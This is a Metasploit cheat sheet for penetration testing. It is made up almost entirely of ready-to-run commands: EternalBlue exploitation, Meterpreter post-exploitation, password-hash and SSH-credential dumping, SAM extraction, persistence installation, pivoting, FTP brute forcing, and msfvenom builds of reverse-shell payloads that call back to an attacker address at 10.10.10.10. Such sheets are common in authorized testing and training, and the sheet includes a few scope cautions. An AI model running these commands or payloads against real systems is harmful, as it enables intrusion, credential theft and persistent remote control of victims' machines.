
Metasploit Cheat Sheet

Starting Metasploit

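# Start the PostgreSQL database that backs the msf workspace (hosts, services, creds, loot)
sudo service postgresql start
msfdb init                    # first run only: creates the msf database and role

# Launch msfconsole
msfconsole
msfconsole -q                 # quiet (no banner)
db_status                     # inside msfconsole: confirm the DB is connected before scanning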

Core Commands

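# Search for modules (filters can be combined)
search type:exploit name:eternalblue
search cve:2021-44228
search platform:windows smb

# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/smb/smb_ms17_010   # non-destructive vulnerability check before exploiting

# Show module info
info
show options                  # required options are marked "yes"
show targets
show payloads                 # only payloads compatible with the selected module/target
show advanced

# Set options
set RHOSTS 192.168.1.1
set RPORT 445
set LHOST 10.10.10.10         # attacker IP the TARGET can reach (e.g. your VPN tun0 address), never 127.0.0.1
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp   # must match the target's platform and architecture
setg LHOST 10.10.10.10        # global option: persists across modules in this console
unset RPORT

# Run module
check                         # vulnerability check only, where the module implements it
run
exploit
exploit -j                    # run as a background job; new sessions show up in `sessions -l`

# Background session
background
Ctrl+Z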

Meterpreter Commands

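# System info
sysinfo
getuid
getpid

# Navigation
pwd
ls
cd /tmp
cat /etc/passwd

# Upload / download (Windows paths: escape backslashes)
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Users\\Public\\notes.txt /tmp/notes.txt
# The SAM hive lives at C:\Windows\System32\config\SAM and is locked by the kernel while
# Windows runs, so a direct `download` of it fails. Dump it in place instead:
# `hashdump` / `run post/windows/gather/hashdump` (needs SYSTEM), or from a shell
# `reg save HKLM\SAM C:\Windows\Temp\sam.hiv` and download that copy.

# Shell
shell                     # Drop to OS shell
exit                      # Return to meterpreter

# Privilege escalation
getsystem                 # Attempt auto privesc (its techniques need an admin/high-integrity context; fails from a UAC-limited token)
getprivs                  # List privileges

# Process migration
ps                        # List processes
migrate 1234              # Migrate to PID (pick a long-lived process whose architecture matches the payload)

# Pivoting
portfwd add -l 8080 -p 80 -r 192.168.1.5   # Local port forward: attacker:8080 -> 192.168.1.5:80 through this session
run post/multi/manage/autoroute SUBNET=192.168.1.0 NETMASK=255.255.255.0   # route msf modules to that subnet via this session
# Upgrading a plain shell session to meterpreter is not a pivot: do it from msfconsole with `sessions -u <id>`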

Post Exploitation Modules

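# Gather credentials (hash dumps need SYSTEM on Windows / root on Linux)
run post/windows/gather/hashdump
run post/multi/gather/ssh_creds
run post/linux/gather/hashdump

# Enumerate system
run post/multi/recon/local_exploit_suggester   # lists local privesc candidates; verify each before running it
run post/windows/gather/enum_logged_on_users
run post/linux/gather/enum_system

# Persistence (only within engagement scope; record every artifact you install so it can be removed)
run post/windows/manage/persistence_exe REXE=/path/to/payload.exe   # REXE is required; STARTUP=USER|SYSTEM|SERVICE selects the autorun method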

Sessions

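# List sessions
sessions -l

# Interact with session
sessions -i 1

# Upgrade a plain shell session to meterpreter (wraps post/multi/manage/shell_to_meterpreter)
sessions -u 1

# Kill session
sessions -k 1

# Kill all sessions (no confirmation prompt)
sessions -K

# Run command on all sessions
sessions -c whoami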

Auxiliary Scanners

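# SMB version (results are stored in the DB: query with `hosts` and `services`)
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 10                # parallelism; keep low on fragile networks
run

# Port scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445
run

# FTP brute force (noisy and can lock accounts out: confirm the lockout policy and scope first)
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.1
set USER_FILE /usr/share/wordlists/users.txt        # adjust to the wordlists present on your system
set PASS_FILE /usr/share/wordlists/passwords.txt
set STOP_ON_SUCCESS true      # stop spraying a host once a valid login is found
run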

MSFvenom Payloads

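# List payloads
msfvenom -l payloads | grep windows

# Windows reverse shell (exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell (elf)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf

# PHP reverse shell (stageless payload: single underscore, no second stage fetched from the handler)
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.php

# Python reverse shell (staged payload: the handler sends the meterpreter stage after connect)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.py

# Catch the callback: the handler's PAYLOAD, LHOST and LPORT must match what msfvenom was given
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.10
set LPORT 4444
exploit -j

# Encode (shikata_ga_nai is heavily signatured; extra iterations do NOT evade modern AV/EDR — do not rely on it for evasion)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe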